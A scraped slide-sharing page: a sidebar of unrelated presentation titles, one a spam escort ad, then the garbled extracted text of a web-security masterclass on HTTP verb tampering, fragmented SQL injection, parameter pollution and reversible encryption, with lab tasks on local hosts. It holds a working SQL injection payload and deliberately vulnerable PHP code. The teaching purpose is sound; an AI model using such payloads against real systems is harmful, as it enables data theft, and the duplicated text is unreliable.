The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 

Último (20)

CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 

Web注入+http漏洞等描述

  • 1. Vulnerabilities in Web – difficulties (masterclass)
  • 3. Questions to discuss • HTTP Verb Tampering • Fragmented SQL Injections • HTTP Parameter Pollution • Reversed encryption
  • 4. HTTP Verb Tampering HTTP Verb Tampering is an error in access control for HTTP methods. • Administration error • Particular case – vendor’s error vendor’
  • 5. HTTP Verb Tampering What’s the method? What’ method?
  • 7. HTTP Verb Tampering Exploitation • Real-live example (Jboss Auth Bypass) Bypass)
  • 8. HTTP Verb Tampering Exploitation • Practical task http://stat.local/ .htaccess file Result of GET request Result of HACK request
  • 9. Fragmented SQL Injections SQL injection is an vulnerability caused by incorrect input data application processing. User data transferred via web applications are changed to modify processing. SQL request used for exploitation. exploitation. • Insufficient data filtering
  • 10. Fragmented SQL Injections What’s the method? What’ method? Do not forget correct filtering ! filtering! Structure of a valid request (MySQL database) database) INSERT INTO table1 (c1,c2) VALUES (‘value1’,’value2’); value1’ value2’ Here is a valid request with injected SQL commands INSERT INTO table1 (c1,c2) VALUES (‘a’ , ’, user()); -- 1’); a’ user()); 1’
  • 11. Fragmented SQL Injections Why? Why? If there is no filtering for back slash ( “ ” ), an attacker can screen the next symbol by a single or double quote in database request , that do not allow to request, interpret it as a line termination symbol. symbol. The following is required for vulnerability exploitation : exploitation: the request should include more than one string variable . variable. Remember: it’s necessary to filter not only user data, it’ but also data received from databases . databases.
  • 12. Fragmented SQL Injections Exploitation • Real-life example (Coppermine Photo Gallery <= 1.4.19 ) 1.4.19) GET,POST,REQUEST – “” symbol is not filtered. filtered. You can specify “” in email parameter. Exploitation is possible via a child request to database when you try to access system features after authorization. authorization.
  • 13. Fragmented SQL Injections Exploitation • Practical task http://tracker.local/index.php http://tracker.local/index.php «Bug tracking system for source code». code»
  • 14. Fragmented SQL Injections Exploitation • Practical task http://tracker.local/add.php http:// ://tracker.local/add.php Vulnerable code (add.php file): (add.php file) if (isset($_POST['code']) && isset($_POST['fix'])) { $code=htmlspecialchars($_POST['code']); $fix=htmlspecialchars($_POST['fix']); …. mysql_query("INSERT INTO track (bug,fix) VALUES ('".$code."','".$fix."')"); } Database request looks as follows : follows: INSERT INTO track (bug,fix) VALUES ( ‘value1’,’value2’); (‘value1’ value2’
  • 15. Fragmented SQL Injections Exploitation • Practical task http://tracker.local/add.php http:// ://tracker.local/add.php Vulnerable code (add.php file): file) if (isset($_POST['code']) && isset($_POST['fix'])) { $code=htmlspecialchars($_POST['code']); $fix=htmlspecialchars($_POST['fix']); …. mysql_query("INSERT INTO track (bug,fix) VALUES ('".$code."','".$fix."')"); } Database request looks as follows : follows: INSERT INTO track (bug,fix) VALUES ( ‘value1’, ’, user()) – 1’); (‘value1 user()) 1’
  • 16. Fragmented SQL Injections Exploitation • Practical task http://tracker.local/view.php Vulnerable code (add.php file): file) if (isset($_POST['code']) && isset($_POST['fix'])) { $code=htmlspecialchars($_POST['code']); $fix=htmlspecialchars($_POST['fix']); …. mysql_query("INSERT INTO track (bug,fix) VALUES ('".$code."','".$fix."')"); } As a result, fix column in track table contents a value that is user() function result.
  • 17. HTTP Parameter Pollution HTTP Parameter Pollution is a vulnerability caused by a situation that different platforms (web server and web application language ) process sequence of language) HTTP request parameters with the same names differently. differently.
  • 18. HTTP Parameter Pollution Technology/Environment Interpretation of parameters Example ASP.NET/IIS Binding via comma par1=val1,val2 ASP/IIS Binding via comma par1=val1,val2 PHP/APACHE Последний параметр результирующий par1=val2 PHP/Zeus Last parameter includes result par1=val2 JSP, Servlet/Apache Tomcat First parameter includes result par1=val1 JSP,Servlet/Oracle Application Server 10g First parameter includes result par1=val1 JSP,Servlet/Jetty First parameter includes result par1=val1 IBM Lotus Domino Первый параметр результирующий par1=val1 IBM HTTP Server Last parameter includes result par1=val2 mod_perl,libapeq2/Apache First parameter includes result par1=val1 Perl CGI/Apache First parameter includes result par1=val1 mod_perl/Apache First parameter includes result par1=val1 mod_wsgi (Python)/Apache Returns an array ARRAY(0x8b9058c) Pythin/Zope First parameter includes result par1=val1 IceWarp Returns an array ['val1','val2'] AXIS 2400 Last parameter includes result par1=val2 Linksys Wireless-G PTZ Internet Camera Binding via comma par1=val1,val2 Ricoh Aficio 1022 Printer Last parameter includes result par1=val2 webcamXP Pro First parameter includes result par1=val1 DBMan Binding via 2 tildes par1=val1~~val2
  • 19. HTTP Parameter Pollution According to PHP web application language . language. An interesting variable variables_order in php.ini configuration file (establishes variable processing ). (establishes processing) Why is it interesting? interesting? GET /?id=1 /?id=1 Cookie: id=2 В итоге: итоге: $_GET[‘id’]=1 $_GET[‘id’ ]=1 $_REQUEST[‘id’]=2 $_REQUEST[‘id’ ]=2 The frequent error in request processing: $_GET is checked, but the value is assigned to from $_REQUEST. checked,
  • 20. HTTP Parameter Pollution Exploitation • Real-life example (www.blogger.com blog service) service) Vulnerability as a part of «Rewarding web application security research» program research» Error in input setting processing – the first suitable value is checked but result includes the last one. one. Supposedly, vulnerability is in QUERY_STRING check and then in variable declaration made via array data received in the request . request.
  • 21. HTTP Parameter Pollution Exploitation • Practical task http://blogger.local/index.php
  • 22. HTTP Parameter Pollution Exploitation • Practical task http://blogger.local/register.php
  • 23. HTTP Parameter Pollution Exploitation • Practical task http://blogger.local/invite.php
  • 24. HTTP Parameter Pollution Exploitation • Practical task http://blogger.local/invite.php
  • 25. HTTP Parameter Pollution Exploitation • Practical task http://blogger.local/invite.php gpc_order (php.ini) – “GPC” GPC”
  • 26. HTTP Parameter Pollution Exploitation • Practical task http://blogger.local/add.php
  • 27. Reversible Encryption Reversible encryption in web applications is possibly insecure as it can be used by attackers in: in: • Exploitation of SQL Injection vulnerability ; vulnerability; • Information disclosure (database dump); dump); • Arbitrary file reading; reading; • and so on. on.
  • 28. Reversible Encryption Exploitation • Practical task http://portal.local http://portal.local
  • 29. Reversible Encryption Exploitation • Practical task http://portal.local http://portal.local
  • 30. Reversible Encryption Exploitation • Practical task http://portal.local http://portal.local
  • 31. Reversible Encryption Exploitation • Practical task http://portal.local/news.php http:// ://portal.local/news.php
  • 32. Reversible Encryption Exploitation • Practical task http://portal.local/news.php http:// ://portal.local/news.php
  • 33. Reversible Encryption Exploitation • Practical task http://portal.local/news.php http:// ://portal.local/news.php
  • 34. Reversible Encryption Exploitation • Practical task http://portal.local/ http:// ://portal.local/
  • 35. Reversible Encryption Exploitation • Practical task http://portal.local/ http:// ://portal.local/ http://portal.local/xor_tool/
  • 36. Reversible Encryption Exploitation • Practical task http://portal.local/ http:// ://portal.local/ FAILED.
  • 37. Reversible Encryption Exploitation • Practical task http://portal.local/ http:// ://portal.local/ 1. “test” user with “12345678910qwerty” password test” 1234567891 qwerty” 2. test : UFBQR1FQRk9cQ0QIFgcRBx0=
  • 38. Reversible Encryption Exploitation • Practical task http://portal.local/ http:// ://portal.local/ http://portal.local/xor_tool/
  • 39. Instead of conclusions What’s next? What’ � Try to do practical tasks � Take part in competitions
  • 40. Thank you for your attention! attention! Questions? ygoltsev@ptsecurity.ru